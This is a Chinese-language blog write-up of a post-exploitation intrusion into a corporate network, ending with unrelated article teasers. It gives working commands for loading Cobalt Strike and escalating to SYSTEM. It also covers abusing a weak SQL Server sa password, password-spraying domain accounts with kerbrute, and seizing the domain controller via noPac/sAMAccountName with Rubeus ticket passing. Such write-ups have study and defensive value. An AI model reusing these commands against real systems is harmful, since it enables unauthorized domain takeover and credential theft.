某集团后渗透实战

一颗小胡椒2022-01-12 15:24:31

前言

某集团后渗透,接手的时候就感觉有域,一次利用域的新漏洞攻击排坑之旅,简单分享下思路~

CS上线

如图所示,哥斯拉不能执行任何命令,需要绕过

但是有些时候360会禁用cmd,但是像wmic这些命令是可以执行的,这个时候可以利用白名单的方式去上线CS

c:\windows\system32\rundll32.exe c:\windows\system32\url.dll,FileProtocolHandler c:\xx.exe

但是这里的情况是什么命令都不能执行了,所以寻找另外一种方法

这里我猜测它是出网的,利用哥斯拉自带的shellcodeLoader上线到CS,这个模块在实战下还是很好用的

上线到CS上

但是上线到CS之后也不能执行命令,看了一下特权

getprivs或whoami /priv

存在sedebug特权,这里可以直接getsystem提权

这个时候不能直接执行命令,如果存在360,会被提示拦截,解决方法是注入到另一个system权限进程下去执行命令

来了,这样就可以执行命令了

通过ip查询在10段,可能存在大网段,并且及有可能存在域

密码dump

导出administrator的密码hash为xxx

隧道代理

这里直接上Stowaway,socks5代理上线

信息收集

利用hash在本网段先进行碰撞,无碰撞到有价值的东西

继续在本机进行信息收集,端口检测情况

基本上都是在10.10.168网段下,但是肯定能确定是个大网段,针对10段进行存活性探测

使用脚本来进行网段存活扫描,找到了如下存活网段

扫描

找到了存活网段后,上fscan进行探测,扫了16段

fscan.exe -h 10.0.0.0/16 -o 16.txt

不出所料,果然有域,探测无zerologon,所以利用最新的sAMAccountName进行攻击,但是该攻击需要一个域内的账号密码,现在手头没有,打算打台域机器,如果没有再去爆破域账号密码

域控IP

10.0.9.10(辅域)10.0.9.9(主域)

针对域控下的网段进行nbtscan扫描

除DC外还存在另一台域机器,而刚好这台域机器存在sqlserver弱密码

sa P@ssw0rd

激活xpcmdshell,利用powershell上线cs

可以看到这台机器在域内,并且是08,可以dump明文密码

先进行密码dump以及进程探测,检查是否域管登录,如果域管登录可以直接注入进程拿域控了

并没有找到域管进程或密码,而且也没有域内的账号密码,这里直接就进行域账号爆破了

利用已经攻陷的域内机器,net user /domain提取所有的用户,保存为user.txt

上传kerbrute,并利用找到的sqlserver密码P@ssw0rd进行喷洒

kerbrute_windows_amd64.exe bruteuser -d xxx user.txt P@ssw0rd --dc 10.0.9.9

成功找到两个用户的密码,接下来利用noPac来进行攻击

noPac攻击

我直接利用sam_the_admin脚本是连接拒绝

proxychains4 -q python3 sam_the_admin.py xxx/ricoh:P@ssw0rd -dc-ip 10.0.9.10 -shell

换了另一个域控尝试,结果如下

这是这个脚本的一个坑,它说漏洞已经打了补丁,其实漏洞是存在的

这里我换了noPac再一次尝试,由于目前域内机器只有一台,且该机器没有.NET4,所以无法执行noPac,这里我给这个机器安装了.NET4,之后就可以运行了

noPac.exe -domain xxx -user spsadmin -pass P@ssw0rd /dc ad03.xxx /mAccount 1234 /mPassword 123456  /service cifs /ptt

导入出现了问题,可能是NET的原因,直接用Rubeus.exe传递即可

execute-assembly C:\Users\costin\Desktop\Rubeus.exe ptt /ticket:doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQsbCV...

导入成功,访问域控

beacon> shell dir \\ad03.xxx\c$

或者后面换成ldap使用mimikatz导出域控hash也可

一键化

一键化利用工具https://github.com/Ridter/noPac,这个可以直接拿下域控了,如下图所示,是可以直接成功的

proxychains4 -q python3 noPac.py xxx/ricoh:'P@ssw0rd' -dc-ip 10.0.9.10 -dc-host ad03 -shell --impersonate administrator -use-ldap

总结

实战中sam_the_admin拉跨了,说漏洞已经打过补丁了,误报是有的,另外noPac.exe限制还是蛮多的,需要域内的机器以及.NET4以上的环境,这个内网的其实还有很多坑没写出来,加固了很多地方。值得一提的是,这个域控存在360主动防御以及安全狗和defender

网段
本作品采用《CC 协议》,转载必须注明作者和本文链接
当我们将Maltego工具的环境工作准备好后,即可使用该工具对信息进行整理和分析了。本文介绍如何对网段地址进行整理和分析,以获取相关的信息。
netspy是一款快速探测内网可达网段工具当我们进入内网后想要扩大战果,那我们可能首先想知道当前主机能通哪些内网段。netspy正是一款应用而生的小工具,体积较小,速度极快,支持跨平台,支持多种协议探测,希望能帮到你!
事例一 重要区域与非重要网络在同一子网或网段 判定依据 网络架构:应划分不同的网络区域,并按照方便管理和控制的原则为各网络区域分配地址 整改措施 涉及资金类交易的支付类系统与办公网划分不同网段 面向互联网提供服务的系统与内部系统划分不同网段 不同级别的系统划分不同网段 事例二 互联网出口无任何访问控制措施。
ARP Request广播报文到达交换机时,交换机无条件广播,处于广播域内的目标主机自然会听到,发现这是对自己的召唤,于是通过单播将自己的MAC地址通过ARP Reply发给源主机。在问题描述中,并没有网关IP的信息。所以源主机会通过ARP Request请求网关的MAC地址,当网关的ARP Reply到来时,源主机就得到了网关的MAC地址。很简单,只要判断:报文的目的MAC是否==myself。否则就是给职位1的。
路由器能隔绝广播,那要VLAN有什么用,既配置了VLAN又划分在不同的网段是不是有些多余了?题主的意思是不要
靶机练习-DC-5
2022-10-14 13:52:21
复现过程攻击机:kali 192.168.11.143靶机:Linux IP自动获取攻击机与靶机都使用net网络连接,在同一网段下环境配置:1、Vulhub下载靶机,并导入vmware2、网络配置中选择更改为桥接模式,桥接至kali所在网卡3、重启虚拟机信息收集:先进行主机发现arp-scan -l. 在尝试这几个聊天框的时候发现CopyRight的年份一直在变化。F5刷新几次,仍在刷新说明和上传了留言无关,是其中的copyright自己在变化。返回路径contactus,多次刷新,copyright并没有发生变化。说明问题出在thankyou.php中。
靶场地址:https://download.vulnhub.com/ted/Ted.7z靶场设置 使用VM打
本文是一份全面的指南,解释了如何使用nProbe Cento构建一个高效的100 Gbit NetFlow传感器。旨在帮助大家充分利用NetFlow技术,以监控和分析高速网络流量。当需要监控分布式网络,了解流经上行链路或关键网段的网络流量时,NetFlow等技术通常是最佳选择。 nProbe Pro/Enterprise和nProbe Cento是软件探针,可用于构建多功能传感器,以多种
一颗小胡椒
暂无描述